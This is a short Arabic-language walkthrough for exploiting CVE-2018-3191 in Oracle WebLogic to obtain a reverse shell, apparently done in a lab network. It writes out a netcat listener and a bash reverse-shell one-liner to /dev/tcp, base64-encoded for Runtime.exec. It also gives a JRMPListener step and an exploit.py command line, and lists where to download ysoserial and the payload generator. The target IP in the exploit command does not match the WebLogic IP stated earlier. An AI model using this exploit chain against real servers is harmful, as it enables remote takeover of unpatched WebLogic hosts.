
CVE-2018-3191 شل عكسي
CVE-2018-3191 شل عكسي (Reverse Shell) IP المحلي: 172.16.38.1 Weblogic: 172.16.38.174:7001
ثم تنفيذ nc -lvv 7777
(1) أمر bash لتجنب تحويل الرموز الخاصة أثناء تنفيذ Runtime.getRuntime().exec()، تم تحويله باستخدام base64 ثم فك تشفيره، النص الصريح: bash -i >& /dev/tcp/172.16.38.1/7777 0>&1 (2) هذه العملية تنشئ مستمع JRMPListener محليًا، يستقبل طلب Weblogic المخترق وينفذ أمر bash العكسي المحدد. (3) Nc تستمع على المنفذ 7777 انتظارًا لاتصال bash العكسي من مضيف Weblogic. 2. تنفيذ python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222، استغلال الثغرة لجعل Weblogic يصل إلى خدمة RMI البعيدة وينفذ أمر bash العكسي.
الأدوات المطلوبة للهجوم: ysoserial-master.jar // أداة استغلال إلغاء التسلسل https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar weblogic-spring-jndi-10.3.6.0.jar // أداة توليد حمولة CVE-2018-3191 https://github.com/voidfyoo/CVE-2018-3191/releases exploit.py // أداة إرسال بروتوكول T3 الخاصة بـ Weblogic، مدمجة مع حمولة CVE-2018-3191